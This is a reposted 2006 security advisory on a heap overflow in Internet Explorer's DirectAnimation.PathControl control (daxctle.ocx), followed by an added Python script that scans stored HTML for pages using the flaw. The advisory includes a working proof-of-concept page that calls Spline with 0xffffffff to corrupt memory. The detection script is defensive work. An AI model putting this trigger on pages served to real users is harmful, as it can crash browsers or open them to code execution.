Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

2006.08.31
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: None
Integrity impact: None
Availability impact: Partial

Advisory ID: XSec-06-10

Advisory Name: Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability

Release Date: 08/28/2006

Tested on:
  Windows 2000/XP/2003
  Internet Explorer 6.0 SP1

Affected version:
  Windows 2000
  Windows XP
  Windows 2003

Author: nop <nop#xsec.org>
http://www.xsec.org

Overview:
When Internet Explorer handles the Spline method of the DirectAnimation.PathControl COM object (daxctle.ocx), setting the first parameter to 0xffffffff triggers an invalid memory write, which an attacker may use to cause a DoS and possibly to execute arbitrary code.

Exploit:
=============== daxctle.htm start ================
<!--
// Internet Explorer (daxctle.ocx) Heap Overflow Vulnerability
// tested on Windows 2000 SP4/XP SP2/2003 SP1
// http://www.xsec.org
// nop (nop#xsec.org)
// CLSID: {D7A7D7C3-D47F-11D0-89D3-00A0C90833E6}
// Info: Microsoft DirectAnimation Path
// ProgID: DirectAnimation.PathControl
// InprocServer32: C:\WINNT\system32\daxctle.ocx
--!>
<html>
<head>
<title>test</title>
</head>
<body>
<script>
var target = new ActiveXObject("DirectAnimation.PathControl");
target.Spline(0xffffffff, 1);
</script>
</body>
</html>
=============== daxctle.htm end ==================

Link: http://www.xsec.org/index.php?module=releases&act=view&type=1&id=19

About XSec:
We are redhat.
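
Added example (not part of the XSec advisory): a Python triage script for stored HTML, such as proxy captures, that flags pages which load the control by the ProgID or CLSID given above and call Spline with a large or non-literal first argument. The 0x10000 threshold, the finding names, the 32-bit masking of literals and the sample page are assumptions made for this example.

```python
import re

# Identifiers taken from the advisory.
CLSID = "D7A7D7C3-D47F-11D0-89D3-00A0C90833E6"
PROGID = "DirectAnimation.PathControl"
IDENT = r"[A-Za-z_$][\w$]*"

# name = new ActiveXObject("DirectAnimation.PathControl")
NEW_OBJ = re.compile(
    rf"({IDENT})\s*=\s*new\s+ActiveXObject\s*\(\s*[\"']{re.escape(PROGID)}[\"']", re.I)
# <object ... classid="clsid:D7A7D7C3-..."> with an optional id attribute
OBJ_TAG = re.compile(r"<object\b[^>]*>", re.I)
CLASSID = re.compile(rf"classid\s*=\s*[\"']?clsid:\{{?{re.escape(CLSID)}", re.I)
ID_ATTR = re.compile(rf"\bid\s*=\s*[\"']?({IDENT})", re.I)
# name.Spline(<first argument>
SPLINE = re.compile(rf"({IDENT})\s*\.\s*Spline\s*\(\s*([^,)]*)", re.I)

# Constructed sample: <object> form, first argument is not a literal.
SAMPLE = """<object id="pc" classid="clsid:D7A7D7C3-D47F-11D0-89D3-00A0C90833E6">
</object><script>var n = userCount(); pc.Spline(n, 1);</script>"""


def first_arg_value(token):
    """Literal as unsigned 32-bit (coercion is an assumption), else None."""
    try:
        return int(token.strip(), 0) & 0xFFFFFFFF
    except ValueError:
        return None


def scan(html, threshold=0x10000):
    """Return sorted (finding, detail) tuples; threshold is a heuristic."""
    findings, names = set(), set()
    for m in NEW_OBJ.finditer(html):
        names.add(m.group(1))
        findings.add(("loads-control", "progid"))
    for tag in OBJ_TAG.findall(html):
        if CLASSID.search(tag):
            findings.add(("loads-control", "clsid"))
            names.update(ID_ATTR.findall(tag)[:1])  # script name of the object
    for m in SPLINE.finditer(html):
        if m.group(1) not in names:
            continue  # Spline() on some unrelated object
        value = first_arg_value(m.group(2))
        if value is None:
            findings.add(("spline-unresolved-arg", m.group(2).strip()))
        elif value >= threshold:
            findings.add(("spline-large-arg", hex(value)))
    return sorted(findings)
```

Calling scan() on a page's text returns an empty list when the control is never loaded; a "loads-control" finding on its own is still worth reviewing, because the regex matching does not follow values through variables.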

